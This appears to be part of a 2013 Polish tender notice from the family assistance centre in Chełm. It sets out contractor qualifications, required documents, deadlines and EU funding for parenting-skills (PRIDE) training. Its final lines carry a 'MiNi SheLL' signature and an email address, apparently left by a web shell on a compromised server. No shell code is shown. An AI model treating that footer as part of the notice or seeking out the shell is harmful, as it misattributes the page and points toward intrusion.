<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia, w szczególności w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 zamówienia o wartości minimum 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych) każde, polegające na zorganizowaniu i przeprowadzeniu szkoleń  dotyczących umiejętności i kompetencji rodzicielskich. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/ nie spełnia wymagany warunek na podstawie:
a)oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ),
b)wykazu wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz  załączeniem dowodów czy zostały wykonane należycie  (załącznik nr 4 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączne doświadczenie Wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania odpowiednim potencjałem technicznym.   Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał techniczny Wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący warunku osoby zdolne do wykonania zamówienia. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie:
a)oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ), 
b)wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do SIWZ).
Przedłożony wykaz powinien zawierać co najmniej 2 osoby posiadające certyfikat ukończenia kursu kwalifikacyjnego dla trenerów Programu PRIDE: Rodzinna Opieka Zastępcza Adopcja wydanego przez Towarzystwo Nasz Dom oraz co najmniej 1 psychologa i 1 pedagoga posiadających uprawnienia do przeprowadzania odpowiednio badań psychologicznych i badań pedagogicznych.
c) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane przez Zamawiającego uprawnienia (załącznik nr 6 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał kadrowy Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący sytuacji ekonomicznej i finansowej. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o  udzielenie zamówienia weźmie pod  uwagę  łączną  sytuację ekonomiczną i finansową Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca reprezentowany przez pełnomocnika, winien złożyć wraz z ofertą stosowny dokument pełnomocnictwa w oryginale (ewentualnie notarialnie poświadczoną kopię pełnomocnictwa).
2. Jeżeli najkorzystniejszą ofertę złożą Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przed zawarciem umowy w sprawie zamówienia publicznego złożą umowę regulującą współpracę tych Wykonawców (art. 23 ust.4 ustawy Prawo zamówień publicznych).
3.Zgoda Towarzystwa Nasz Dom na przeprowadzenie szkolenia PRIDE Rodzinna Opieka Zastępcza Adopcja,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia niżej wymienionych okoliczności:
1)zaistnienia siły wyższej  mającej wpływ na realizację umowy;
2)przesunięcie terminu przeprowadzenia zajęć, gdyby to było konieczne z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy a dotyczących uczestników szkolenia; 
3)zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminu realizacji zajęć;
W przypadku wystąpienia którejkolwiek z ww. okoliczności termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chelm.pl (BIP Starostwa Powiatowego w Chełmie)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, 22 - 100 Chełm, Plac Niepodległości 1, pok. nr 149..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2013 godzina 09:30, miejsce: siedziba Zamawiającego (Powiatowe Centrum Pomocy Rodzinie, 22 - 100 Chełm, Plac Niepodległości 1, pok. nr 147 lub za pośrednictwem poczty..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn: START współfinansowany z Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1: Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com